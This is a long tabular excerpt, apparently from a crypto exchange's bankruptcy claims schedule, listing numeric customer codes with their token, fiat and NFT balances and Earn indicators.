| 07319430 | | NFT (305246716875137013/GSW Western Conference Finals Commemorative Banner #784)[1], NFT (311110236573427199/GSW Western Conference Semifinals Commemorative Ticket #413)[1], NFT (375252262834672978/GSW Championship Commemorative Ring)[1], NFT (386011373531610192/GSW Round 1 Commemorative Ticket #660)[1], NFT (395880334013450505/GSW Championship Commemorative Ring)[1], NFT (411046725007549539/GSW Western Conference Finals Commemorative Banner #781)[1], NFT (453093546669997071/GSW Western Conference Finals Commemorative Banner #783)[1], NFT (456096436449446097/GSW Western Conference Finals Commemorative Banner #782)[1], NFT (490097353191365807/Warriors Foam Finger #358 (Redeemed))[1], NFT (512008990920094862/GSW Round 1 Commemorative Ticket #425)[1], NFT (529573697125076384/Warriors Hoop #560 (Redeemed))[1], NFT (572373862701870152/GSW Western Conference Semifinals Commemorative Ticket #412)[1], USD[0.00] | | |
| 07319431 | | USD[10.00] | | |
| 07319433 | | USD[10.00] | | |
| 07319436 | | USD[10.00] | | |
| 07319437 | | USD[10.00] | | |
| 07319438 | | USD[10.00] | | |
| 07319439 | | BTC[.00264206], CUSDT[3], ETH[0], GRT[4.62137987], LINK[0], MATIC[.00000001], SOL[.00000001], SUSHI[1.10861283], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07319441 | | USD[10.00] | | |
| 07319445 | | USD[10.00] | | |
| 07319446 | | BRZ[2], CUSDT[1], DOGE[.44957134], NFT (563707680395548238/Miami Ticket Stub #468)[1], USD[0.00] | | |
| 07319447 | | BTC[0], DOGE[0], ETH[0.00005781], ETHW[0.00005780], SOL[0], USD[0.03], USDT[0.00645700] | | |
| 07319448 | | DOGE[.00000001], ETH[.04563903], ETHW[.04507348], SHIB[121635.13463543], USD[0.93] | Yes | |
| 07319449 | | USD[282.97] | | |
| 07319453 | | USD[10.00] | | |
| 07319454 | | BRZ[1], BTC[.10457517], DOGE[1.00887477], USD[0.00] | | |
| 07319455 | | BTC[0], DOGE[1], ETH[0], USD[0.00] | | |
| 07319456 | | BCH[0], BTC[0], DOGE[0], ETHW[.25168719], USD[0.00], USDT[0] | | |
| 07319457 | | USD[10.00] | | |
| 07319461 | | BRZ[1], CUSDT[2], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319462 | | BRZ[0], BTC[0], CUSDT[8], DOGE[0], ETH[0], SHIB[0], SOL[0.02031889], SUSHI[2.02602717], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07319464 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07319469 | | USD[10.00] | | |
| 07319471 | | BAT[48.26601704], BCH[0], BTC[0], CUSDT[1], DOGE[148.07574283], ETH[.02077006], ETHW[.02051014], GRT[17.41270045], LINK[3.60606409], NFT (308795226959909338/FTX - Off The Grid Miami #3966)[1], NFT (360364406717804350/Romeo #769)[1], NFT (409690352885679212/Juliet #599)[1], NFT (476388230603947903/Entrance Voucher #4024)[1], NFT (503015202779100293/Series 1: Capitals #566)[1], NFT (539160553803137358/Shaq's Fun House Commemorative Ticket #196)[1], SOL[0], SUSHI[.72077791], TRX[110.71968894], USD[104.10], USDT[0.00000001] | Yes | |
| 07319472 | | USD[10.00] | | |
| 07319473 | | BRZ[1], CUSDT[4], DOGE[1], ETH[.03217456], ETHW[.03177784], KSHIB[139.56863723], LINK[2.18849371], SHIB[1], SOL[1.09799543], TRX[1], UNI[.13343776], USD[1.19] | Yes | |
| 07319474 | | USD[10.00] | | |
| 07319475 | | USD[10.00] | | |
| 07319477 | | BTC[.01723149], ETH[.11235808], ETHW[.11124409], GRT[1.00411807], SOL[1.25384385], USD[0.00] | Yes | |
| 07319479 | | USD[6.87] | Yes | |
| 07319481 | | GRT[1], USD[0.00] | | |
| 07319482 | | BRZ[1], CUSDT[3], DOGE[256.98720059], ETH[.02315735], ETHW[.02287007], TRX[1], USD[0.01] | Yes | |
| 07319484 | | USD[510.00] | | |
| 07319486 | | USD[10.00] | | |
| 07319487 | | DOGE[0], ETH[.00000001], SOL[0], USD[0.00], USDT[0] | | |
| 07319489 | | SOL[1.18150956], USD[0.00] | | |
| 07319490 | | DOGE[147.52754892], USD[0.00] | | |
| 07319491 | | DOGE[0], TRX[2], USD[0.01] | | |
| 07319492 | | USD[10.00] | | |
| 07319493 | | BAT[1], DOGE[1], GRT[4], LINK[1.00151155], MATIC[1.0011052], UNI[1.00210803], USD[25000.13], USDT[0.23495915] | Yes | |
| 07319495 | | USD[0.00] | | |
| 07319496 | | USD[10.00] | | |
| 07319497 | | USD[10.00] | | |
| 07319499 | | USD[0.00], USDT[0] | | |
| 07319501 | | USD[10.00] | | |
| 07319502 | Contingent, Disputed | USD[0.00] | | |
| 07319503 | | BAT[1], CUSDT[6], GRT[1], TRX[3], USD[0.00], USDT[1] | | |
| 07319506 | | USD[10.00] | | |
| 07319507 | | USD[10.00] | | |
| 07319508 | | USD[10.00] | | |
| 07319510 | | USD[10.00] | | |
| 07319512 | | BTC[.00019564], CUSDT[1], DOGE[.00099259], USD[0.00] | | |
| 07319513 | | CUSDT[7], DOGE[1], TRX[2], USD[0.00] | | |
| 07319518 | | USD[10.00] | | |
| 07319519 | | USD[0.00] | Yes | |
| 07319520 | | USD[0.00] | | |
| 07319522 | | USD[10.00] | | |
| 07319523 | | DOGE[2], TRX[3], USD[0.01] | | |
| 07319524 | | USD[10.00] | | |
| 07319526 | | CUSDT[1], DOGE[30.17219907], UNI[.30669823], USD[0.00] | | |
| 07319527 | | DOGE[27.76686694], USD[0.00] | | |
| 07319529 | | USD[10.00] | | |
| 07319530 | | USD[10.00] | | |
| 07319531 | | USD[10.00] | | |
| 07319532 | | DOGE[.29091012], USD[0.08] | | |
| 07319533 | | CUSDT[2], DOGE[538.1403622], USD[0.30] | | |
| 07319534 | | BTC[0.00000598], DOGE[.008], SHIB[45237.68204809], USD[0.00], USDT[0.00000001] | Yes | |
| 07319536 | | BTC[.00001], DOGE[0], ETH[.027], ETHW[.027], SOL[.00914617], USD[-4.44], USDT[0], WBTC[.0000103] | | |
| 07319537 | | CUSDT[5], SOL[0], TRX[2], USD[0.01] | | |
| 07319538 | | BRZ[5.07952967], CUSDT[62.87021428], DOGE[8.34786323], GRT[2.00498957], MATIC[.00000001], NFT (323404614989823402/Cadet 1205)[1], NFT (413704597050223981/Cadet 1259)[1], SOL[.51946428], TRX[1], USD[0.00], USDT[3.24015734] | Yes | |
| 07319539 | | USD[11.00] | Yes | |
| 07319541 | | BAT[1.01390394], BRZ[1], CUSDT[5], DOGE[239.86450176], USD[0.00], USDT[1.08210014] | Yes | |
| 07319542 | | ETH[0], ETHW[0], UNI[0], USD[0.00] | | |
| 07319543 | | CUSDT[4], DOGE[1.00963879], ETH[.03538494], ETHW[.03494718], TRX[1], USD[0.37] | Yes | |
| 07319544 | | DOGE[.44], USD[188.03] | | |
| 07319545 | | USD[0.07] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319546 | | DOGE[0], USD[0.00] | | |
| 07319548 | | USDT[.000552] | | |
| 07319549 | | DOGE[.02], USD[0.36] | | |
| 07319550 | | DOGE[5594.72308511] | | |
| 07319551 | | BRZ[1], BTC[0.00037573], ETH[0], ETHW[10.18277361], LINK[1.00806751], MATIC[1.00621121], SHIB[2], SOL[0], SUSHI[1.00094111], TRX[3], USD[0.00], USDT[0.00000001] | Yes | |
| 07319554 | | USD[10.00] | | |
| 07319555 | | BRZ[0], BTC[.00188932], CUSDT[333.82169141], DOGE[35216.09843085], ETH[.01710106], SHIB[47463360.52895185], SOL[5.65067438], TRX[20535.191763], UNI[9.75778985], USD[308.43], USDT[2.39615044] | Yes | |
| 07319560 | | BAT[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07319561 | | BRZ[1], BTC[0], CUSDT[1], DOGE[0], ETH[0.00251753], ETHW[0.00249017], SOL[7.19689882], USD[0.00] | Yes | |
| 07319562 | | DOGE[.28], MATIC[9.96], USD[1.11] | | |
| 07319564 | | BAT[1.0165555], BRZ[2], CUSDT[19], DOGE[1051.28463319], ETHW[.46191968], GRT[1], LINK[1.0779477], MATIC[2.00133382], SHIB[2], SOL[0.00018901], SUSHI[0.00199413], TRX[15.9054599], UNI[0], USD[0.02], USDT[1.07487086] | Yes | |
| 07319565 | | USD[10.00] | | |
| 07319567 | | BTC[.192616], DOGE[.716], ETH[.472865], ETHW[.472865], LINK[204.495], USD[2.04] | | |
| 07319568 | | USD[10.00] | | |
| 07319569 | | USD[10.00] | | |
| 07319570 | | DOGE[1.52695119], USD[0.00], USDT[0] | | |
| 07319571 | | USD[10.00] | | |
| 07319572 | | USD[0.00], USDT[1] | | |
| 07319573 | | DOGE[6], TRX[1003.08660263], USD[0.00] | | |
| 07319575 | | USD[10.00] | | |
| 07319579 | | DOGE[.165], USD[0.00], USDT[1.52746181] | | |
| 07319581 | | CUSDT[3], DOGE[1], GRT[0], UNI[0], USD[54.25] | | |
| 07319583 | | CUSDT[2], DOGE[3], ETH[0], NFT (312988705455455640/Fuzzy Wuzzy Tubby )[1], NFT (518794632011558481/Fuzzy Tubby)[1], TRX[220.99985568], UNI[0], USD[0.00], USDT[1] | | |
| 07319584 | | DOGE[347.21573221], USD[10.00] | | |
| 07319585 | | ETH[.00000288], ETHW[.31541994], SHIB[1], USD[0.00] | Yes | |
| 07319587 | | ETHW[.00044716], USD[0.00], USDT[0] | | |
| 07319588 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07319592 | | USD[0.00] | | |
| 07319593 | | DOGE[1.992], USD[0.63] | | |
| 07319594 | | USD[10.00] | | |
| 07319596 | | BTC[.00197978], DOGE[1], ETH[.0055301], ETHW[.0055301], LINK[1.05247232], TRX[1], USD[0.00] | | |
| 07319599 | | USD[10.00] | | |
| 07319601 | | USD[0.00] | Yes | |
| 07319602 | | USD[10.00] | | |
| 07319604 | | USD[10.00] | | |
| 07319606 | | SOL[49.99881293], USD[17.64] | | |
| 07319609 | | USD[10.00] | | |
| 07319611 | | DOGE[934.28326267], SHIB[809717.43825232], USD[0.00] | | |
| 07319612 | | DOGE[17.80788719], USD[0.00] | | |
| 07319614 | | BRZ[0], ETH[0], GRT[1], USD[0.01], USDT[2] | | |
| 07319615 | | DOGE[2], USD[0.00] | | |
| 07319617 | | USD[10.00] | | |
| 07319618 | | USD[10.00] | | |
| 07319619 | | AUD[0.34], BAT[1.07646681], BRZ[2], BTC[.00000004], CUSDT[14], DOGE[9103.31700105], ETH[.00890443], ETHW[.00879499], GRT[4.24680189], SUSHI[.01512039], TRX[9.01851208], USD[0.18], USDT[0.457699963] | Yes | |
| 07319623 | | CUSDT[4], TRX[284.17229916], UNI[.00000736], USD[0.00] | Yes | |
| 07319624 | | DOGE[535.33332033], USD[20.00] | | |
| 07319625 | | USD[10.00] | | |
| 07319628 | | CUSDT[1], USD[0.00] | Yes | |
| 07319630 | | USD[10.00] | | |
| 07319632 | | BRZ[1], DOGE[128.30155655], USD[28.98] | | |
| 07319635 | | USD[10.00] | | |
| 07319636 | | BTC[0], DOGE[0.01145093], ETH[0], LINK[0], MATIC[0], SHIB[132.96627537], SOL[0], SUSHI[0], UNI[0], USD[0.00] | Yes | |
| 07319638 | | DOGE[119.07633361], TRX[1], USD[0.00] | | |
| 07319640 | | DOGE[.00043818], USD[0.00], USDT[0] | Yes | |
| 07319641 | | BRZ[0], USD[0.18] | | |
| 07319642 | | USD[0.00] | | |
| 07319643 | | BRZ[2], DOGE[141.72542827], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319644 | | USD[10.00] | | |
| 07319645 | | BAT[1.0165555], BRZ[1], CUSDT[2], DOGE[2], SOL[0.00170670], SUSHI[0], TRX[6], USD[0.00] | Yes | |
| 07319647 | | BTC[.00000071], SOL[.996] | | |
| 07319649 | | CUSDT[9], GRT[.01326348], SHIB[1], TRX[1], USD[0.03], USDT[0] | Yes | |
| 07319650 | | BRZ[2], CUSDT[4], DOGE[1], ETH[0], GRT[1], SOL[0], TRX[2], USD[0.00], USDT[1.00000014] | | |
| 07319652 | | BTC[0], DOGE[391.84], ETH[.00032], ETHW[.00032], UNI[.0272], USD[0.32] | | |
| 07319653 | | CUSDT[15], TRX[2], USD[0.00] | | |
| 07319655 | | USD[10.00] | | |
| 07319657 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07319659 | | DOGE[6510.483], USD[0.04] | | |
| 07319660 | | USD[10.00] | | |
| 07319662 | | USD[0.00] | | |
| 07319663 | | DOGE[1], SOL[.33384231], USD[0.00], USDT[0.00000028] | Yes | |
| 07319665 | | BAT[729.30114471], BRZ[15.87214264], BTC[.03798572], CUSDT[24], DOGE[31.96121954], ETH[.00002017], ETHW[2.04629162], GRT[2.00039621], SHIB[23], SOL[0], TRX[22.91557181], UNI[1.06807451], USD[2565.59], USDT[1.02543197] | Yes | |
| 07319666 | | BF_POINT[100], USD[10.00] | | |
| 07319668 | | DOGE[166.72874533], USD[0.00] | | |
| 07319669 | | BTC[0], USD[0.00] | | |
| 07319670 | | AVAX[0], ETH[0], ETHW[0], LINK[0], SOL[.0000001], USD[0.00], USDT[0.00000010] | | |
| 07319671 | | DOGE[0], GRT[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07319672 | | CUSDT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07319676 | | USD[10.00] | | |
| 07319677 | | DOGE[.821], SHIB[1000000], USD[26.56] | | |
| 07319678 | | USD[10.00] | | |
| 07319679 | | USD[10.00] | | |
| 07319680 | | BRZ[1], CUSDT[4], SHIB[1], USD[0.00] | Yes | |
| 07319681 | | DOGE[0], ETHW[.00919108], UNI[0], USD[10.82] | | |
| 07319686 | | USD[10.00] | | |
| 07319687 | | BRZ[1], DOGE[.78928979], USD[66.08] | | |
| 07319688 | | DOGE[1581.78789062], NFT (341922350668263762/Coachella x FTX Weekend 1 #28348)[1], TRX[1], USD[0.00] | | |
| 07319689 | | USD[10.00] | | |
| 07319690 | | BRZ[0], DOGE[151.08165943], USD[0.00], USDT[0] | | |
| 07319692 | | BRZ[0.00004995], BTC[0], CUSDT[1], DOGE[1], ETH[0], ETHW[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07319693 | | BRZ[1], CUSDT[3], ETH[.01000027], SHIB[1], USD[1890.16], USDT[1.00001826] | Yes | |
| 07319694 | | USD[10.00] | | |
| 07319695 | | AAVE[0], AVAX[.00001252], BAT[1.0165555], BRZ[8.34164568], BTC[0], CUSDT[30], DOGE[12.02363482], ETH[0], ETHW[0.00000487], GRT[1.00367791], LINK[.00020154], MATIC[0.00478327], SHIB[22], SOL[2.46259707], SUSHI[0], TRX[19.55870744], USD[0.00], USDT[0] | Yes | |
| 07319697 | | BCH[0], BTC[0.00000038], CUSDT[2], DOGE[9.56161977], ETH[0], ETHW[0], GRT[3.04097713], SHIB[6], SOL[0], USD[0.00], USDT[0.00001809] | Yes | |
| 07319698 | | USD[10.00] | | |
| 07319699 | | CUSDT[2], DOGE[1], ETH[.01587179], ETHW[.01587179], TRX[2], USD[0.00] | | |
| 07319700 | | DOGE[.32704044], USD[0.06] | | |
| 07319702 | | USD[10.00] | | |
| 07319703 | | USD[0.00] | Yes | |
| 07319704 | | MATIC[20], USD[1.02] | | |
| 07319707 | | BAT[1], CUSDT[1], DOGE[2], GRT[0], SUSHI[0], TRX[1], USD[0.00], USDT[0] | | |
| 07319708 | | DOGE[0.93685619], USD[0.00], USDT[0] | | |
| 07319710 | | CUSDT[9], DOGE[6070.23064731], ETH[.22653905], ETHW[.22653905], SHIB[9744645.00664734], TRX[4], USD[0.00] | | |
| 07319712 | | CUSDT[4], DOGE[11.02950311], ETH[0], ETHW[0], TRX[1], USD[0.53] | | |
| 07319714 | | BRZ[2], DOGE[2], SOL[0], TRX[1], USD[0.00], USDT[1.09436291] | Yes | |
| 07319715 | | DOGE[1], UNI[.00002938], USD[0.01] | | |
| 07319716 | | TRX[189.6562613], USD[0.00] | | |
| 07319718 | | USD[10.00] | | |
| 07319719 | | USD[10.00] | | |
| 07319720 | | BF_POINT[300], BTC[0], ETH[0], USD[0.00] | Yes | |
| 07319721 | | USD[10.00] | | |
| 07319723 | | DOGE[1], NFT (380939187013489453/Australia Ticket Stub #1165)[1], NFT (485695659266645864/Lobus #75)[1], NFT (518576482528731619/Northern Lights #203)[1], NFT (551349139942452853/The Founder #16)[1], SHIB[3], SOL[2.09769733], USD[0.00] | | |
| 07319724 | | BRZ[1], CUSDT[2], GRT[1], TRX[1], USD[0.00] | | |
| 07319726 | | DOGE[7760.29130103], USD[0.00] | | |
| 07319727 | | USD[11.09] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319728 | | DOGE[28.51388998], USD[0.00] | | |
| 07319729 | | USD[10.00] | | |
| 07319730 | | CUSDT[2], DOGE[1444.07158111], ETH[.00407284], ETHW[.00407284], TRX[1], USD[0.01] | | |
| 07319732 | | TRX[2], USD[0.00], USDT[0] | | |
| 07319733 | | USD[10.00] | | |
| 07319734 | | BRZ[2], CUSDT[2], DOGE[2], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07319737 | | DOGE[40.00513139], USD[0.00], USDT[0] | | |
| 07319739 | | BAT[5.11653594], BRZ[2], BTC[.10961424], DOGE[4], GRT[2], MATIC[6.06623498], TRX[9], USD[1658.87], USDT[4.04236205] | Yes | |
| 07319740 | | DOGE[.448], ETH[.000056], ETHW[.000056], GRT[54.78], SHIB[200000], SOL[.0016], TRX[122.508], USD[0.01] | | |
| 07319741 | | BRZ[1], CUSDT[8], DOGE[1], USD[0.01] | Yes | |
| 07319742 | | USD[10.00] | | |
| 07319743 | | SOL[.22067485], USD[0.00] | | |
| 07319747 | | CUSDT[1], USD[20.64] | | |
| 07319748 | | DOGE[33.27885480], TRX[1], USD[0.00], USDT[0] | | |
| 07319750 | | USD[10.00] | | |
| 07319751 | | DOGE[577.4509], USD[0.31] | | |
| 07319754 | | CUSDT[1], DOGE[1], USD[68.27] | | |
| 07319755 | | BRZ[5.07952967], CUSDT[14], DOGE[2], ETH[.00155744], ETHW[.00154376], GRT[1.00415692], SOL[0.00053183], TRX[8], USD[0.00], USDT[0] | Yes | |
| 07319756 | | CUSDT[1], DOGE[1.00087991], GRT[0], TRX[1], USD[10.00] | | |
| 07319762 | | BAT[1], BRZ[4], CUSDT[24], DOGE[8722.37592824], GRT[1], TRX[6], USD[50.40], USDT[1] | | |
| 07319763 | | BCH[0], BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], LTC[0], TRX[1], USD[0.00] | Yes | |
| 07319764 | | ETHW[.00024101], NFT (38085286799466936/Romeo #690)[1], USD[1.39], USDT[0], YFI[.00000001] | Yes | |
| 07319765 | | USD[10.00] | | |
| 07319768 | | BAT[14.49762047], CUSDT[1037.86222205], DOGE[29397.04588275], KSHIB[661.76817773], LINK[.31390957], SHIB[718242.10639563], TRX[1999.10693754], USD[0.00] | Yes | |
| 07319769 | | USD[10.00] | | |
| 07319772 | | LINK[.3705858], USD[0.00] | | |
| 07319773 | | ETH[.00099154], ETHW[.00099154], USD[0.03] | | |
| 07319774 | | BRZ[1], BTC[.00001776], DOGE[1], ETHW[6.87394186], GRT[1], LINK[1.03174246], TRX[1], USD[0.00], USDT[1.00082963] | Yes | |
| 07319775 | | AAVE[0], BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0.00011008], ETHW[0.00011008], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000429] | Yes | |
| 07319777 | | DOGE[128.40901867], USD[0.00] | | |
| 07319778 | | BTC[.00056735], DOGE[2.00002576], USD[19.70] | | |
| 07319779 | | BAT[1], BRZ[1], DOGE[1.00000367], USD[0.01] | | |
| 07319780 | | DOGE[192.53239983], USD[0.00] | | |
| 07319782 | | DOGE[.664], ETHW[.210789], USD[0.07] | | |
| 07319783 | | CUSDT[3], DOGE[605.70818516], TRX[73.45096319], USD[0.00] | | |
| 07319785 | | BTC[0], CUSDT[1], DOGE[0], USD[0.03] | | |
| 07319786 | | BRZ[1], DOGE[3730.58980226], TRX[1], USD[5.09] | | |
| 07319787 | | SOL[0.00082621], USD[0.00] | | |
| 07319790 | Contingent, Disputed | USD[0.00] | | |
| 07319794 | | CUSDT[2], DOGE[14884.91042904], TRX[9100.54559883], USD[0.00] | Yes | |
| 07319797 | | BTC[.00002136] | | |
| 07319798 | | USD[10.00] | | |
| 07319799 | | CUSDT[1], DOGE[.00006498], USD[0.00] | | |
| 07319800 | | BTC[.01], USD[10.00] | | |
| 07319801 | | USD[20.00] | | |
| 07319802 | | BRZ[0], BTC[0], DOGE[1], ETH[0], GRT[0], LINK[1], SOL[0], USD[0.00], USDT[1.00000001] | | |
| 07319803 | | USD[10.00] | | |
| 07319804 | | USD[10.00] | | |
| 07319806 | | DOGE[155.4986016], TRX[1], USD[0.00] | | |
| 07319807 | | USD[10.00] | | |
| 07319809 | | BRZ[1], CUSDT[9], DOGE[5335.14630963], SOL[1.38309014], USD[0.00] | Yes | |
| 07319811 | | DOGE[38.67699161], USD[0.00] | | |
| 07319812 | | BAT[1.01429025], BRZ[3], CUSDT[7], ETH[.00001108], ETHW[1.21249817], SUSHI[7.6578003], TRX[2331.40792973], UNI[.77835259], USD[0.00], USDT[2.19732952] | Yes | |
| 07319815 | | DOGE[122.78278255], ETH[1.05486431], ETHW[1.05486431], LTC[0], SHIB[1589750.16805262], SOL[.999995] | | |
| 07319816 | | USD[6.40] | | |
| 07319818 | | BAT[1], DOGE[12430.96618317], USD[10.00] | | |
| 07319821 | | BRZ[1], CUSDT[7], DOGE[5], ETHW[.07587003], LINK[.00003534], MATIC[.00018604], SHIB[366986.43648452], TRX[4], UNI[.97085734], USD[0.01], USDT[0] | Yes | |
| 07319822 | | CUSDT[1], DOGE[136.04090738], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319823 | | CUSDT[1], USD[0.01] | | |
| 07319825 | | CUSDT[1], DOGE[608.88064599], USD[10.00] | | |
| 07319826 | | DOGE[2.57065734], TRX[1], USD[0.94] | | |
| 07319827 | | DOGE[3], USD[33.14] | | |
| 07319828 | | USD[10.00] | | |
| 07319829 | | USD[10.00] | | |
| 07319830 | | USD[10.00] | | |
| 07319831 | | BAT[7.77415389], BRZ[3], CUSDT[4], GRT[1.00498957], SOL[.27764793], TRX[8.00087675], USD[0.00], USDT[4.44237359] | Yes | |
| 07319833 | | BTC[.00005727], DOGE[0], SOL[224.7972], USD[0.00] | | |
| 07319834 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07319835 | | USD[10.00] | | |
| 07319836 | | DOGE[1135.21250951], USD[0.50] | | |
| 07319837 | | BTC[.00104647], CUSDT[4], DOGE[915.24926964], ETH[.01638086], ETHW[.01617566], TRX[2160.0843918], USD[0.70] | Yes | |
| 07319838 | | DOGE[1683.72632627], USD[10.00] | | |
| 07319839 | | USD[10.00] | | |
| 07319841 | | USD[0.00] | | |
| 07319844 | | SOL[1.03041508], USD[0.00] | | |
| 07319845 | | USD[10.00] | | |
| 07319846 | | USD[10.00] | | |
| 07319847 | | BRZ[2], CUSDT[10], DOGE[2], ETH[0], TRX[8], USD[0.00], USDT[1] | | |
| 07319850 | | DOGE[.01070601], USD[0.00] | | |
| 07319853 | | USD[0.00] | | |
| 07319855 | | BAT[.00018284], BRZ[0], DOGE[0], GRT[0], MATIC[0], USD[203.81] | Yes | |
| 07319857 | | BTC[0], DOGE[0] | | |
| 07319859 | | USD[10.00] | | |
| 07319861 | | BTC[0], USD[0.00] | | |
| 07319865 | | USD[0.24] | Yes | |
| 07319866 | | DOGE[1], USD[9.97] | | |
| 07319867 | | USD[10.00] | | |
| 07319868 | | USD[10.00] | | |
| 07319869 | | USD[0.00] | | |
| 07319870 | | USD[10.00] | | |
| 07319876 | | USD[10.00] | | |
| 07319878 | | AUD[2.83], BRZ[1], CUSDT[2], SHIB[3], TRX[.84832997], USD[0.00], USDT[0] | Yes | |
| 07319880 | | USD[0.11], USDT[2.11152] | | |
| 07319881 | | SUSHI[.64952103], USD[11.04] | Yes | |
| 07319885 | | CUSDT[3], DOGE[.00794117], NFT (543351853216193395/FTX - Off The Grid Miami #3028)[1], TRX[3], USD[0.00] | Yes | |
| 07319886 | | BRZ[1], CUSDT[2], DOGE[1], SUSHI[5.25673332], USD[0.00] | | |
| 07319887 | | CUSDT[2], DOGE[.00002889], TRX[3], USD[0.75] | | |
| 07319889 | | BTC[.00017727], USD[0.00] | | |
| 07319891 | | DOGE[0], USD[3.96], USDT[0] | | |
| 07319892 | | USD[10.00] | | |
| 07319894 | | USD[10.00] | | |
| 07319896 | | BRZ[0], BTC[0], DOGE[0], LINK[0], LTC[0], SHIB[1], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07319897 | | DOGE[0], USD[10.00] | | |
| 07319900 | | USD[10.00] | | |
| 07319901 | | BTC[.00234463], CUSDT[2], DOGE[1], ETH[.06246216], ETHW[.06168509], SOL[19.85118437], USD[351.15] | Yes | |
| 07319903 | | CUSDT[8], DOGE[2.00004986], TRX[1], USD[0.00] | | |
| 07319905 | | NFT (562533472126274628/Coachella x FTX Weekend 2 #8748)[1] | | |
| 07319906 | | USD[10.00] | | |
| 07319909 | | DOGE[8.21040344], USD[0.00] | | |
| 07319910 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07319912 | | USD[0.00] | Yes | |
| 07319913 | | USD[10.00] | | |
| 07319914 | | USD[10.00] | | |
| 07319915 | | DOGE[55.72285244], SOL[9.066], USD[17.77] | | |
| 07319917 | | USD[10.00] | | |
| 07319919 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319920 | | BRZ[6], CUSDT[10], USD[0.39] | | |
| 07319921 | | BRZ[3], CUSDT[1], DOGE[1], LINK[0], TRX[3], USD[0.00], USDT[0.00000001] | | |
| 07319924 | | USD[10.00] | | |
| 07319925 | | BAT[3.16037748], BRZ[5], CUSDT[4], DOGE[16046.01198783], ETH[2.66933146], ETHW[2.66821031], GRT[1.00019173], KSHIB[6946.66647727], MATIC[597.44312964], SHIB[31894653.37423606], TRX[12.0533838], USDI[2786.84], USDTI2.07582049] | Yes | |
| 07319930 | | BRZ[1], USD[10.00] | | |
| 07319934 | | CUSDT[1], DOGE[327.34999137], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07319935 | | BTC[0.00072069], ETH[0], TRX[392.48499718], USD[0.00] | | |
| 07319937 | | TRX[1], USD[0.47] | | |
| 07319938 | | USD[10.00] | | |
| 07319941 | | USD[10.00] | | |
| 07319942 | | DOGE[.808], USD[0.00] | | |
| 07319943 | | BF_POINT[100] | Yes | |
| 07319945 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], USD[0.00], YFI[0] | | |
| 07319946 | | USD[10.00] | | |
| 07319948 | | USD[10.00] | | |
| 07319949 | | USD[10.00] | | |
| 07319951 | | CUSDT[4697.0362668], DOGE[248.00292544], USD[0.19], USDT[0] | | |
| 07319952 | | DOGE[1656.73030828], USD[0.00] | | |
| 07319957 | | USD[0.01] | | |
| 07319958 | | USD[10.00] | | |
| 07319959 | | USD[10.00] | | |
| 07319960 | | DOGE[211.86855314], USD[0.00] | | |
| 07319961 | | AAVE[0], AVAX[0], BRZ[0000641], BTC[0], DOGE[4], ETH[0], GRT[1], LINK[0], LTC[0], MATIC[0], NFT (313696673800441873/Solninjas #1356)[1], NFT (345931864965560935/Roamer #955)[1], NFT (397164344747575968/Roamer #402)[1], NFT (427956114117951264/ApexDucks #4871)[1], NFT (473891157596327280/Roamer #628)[1], SHIB[1775.31791199], SOL[0], SUSHI[0.00032157], TRX[7], UNI[0], USD[0.01] | Yes | |
| 07319962 | | BAT[1], ETH[3.66862941], ETHW[3.66862941], USD[10.00] | | |
| 07319963 | | USD[0.00] | | |
| 07319964 | | USD[10.00] | | |
| 07319965 | | USD[10.00] | | |
| 07319966 | | BTC[.00263392], CUSDT[2], DOGE[4336.28044857], ETH[.04630655], ETHW[.04630655], LTC[.03690125], TRX[1], USD[0.01] | | |
| 07319968 | | USD[10.00] | | |
| 07319969 | | USD[10.00] | | |
| 07319970 | | ETH[.00000028], ETHW[.00000028], SOL[.00000059], USD[0.00] | Yes | |
| 07319971 | | USD[0.01] | | |
| 07319972 | | BRZ[1], CUSDT[3], ETHW[.06490466], LINK[.00003977], LTC[.00000648], SHIB[3], SOL[.0000328], TRX[6], UNI[.00002345], USD[0.01] | Yes | |
| 07319974 | | USD[10.00] | | |
| 07319976 | | USD[0.01], USDT[0] | Yes | |
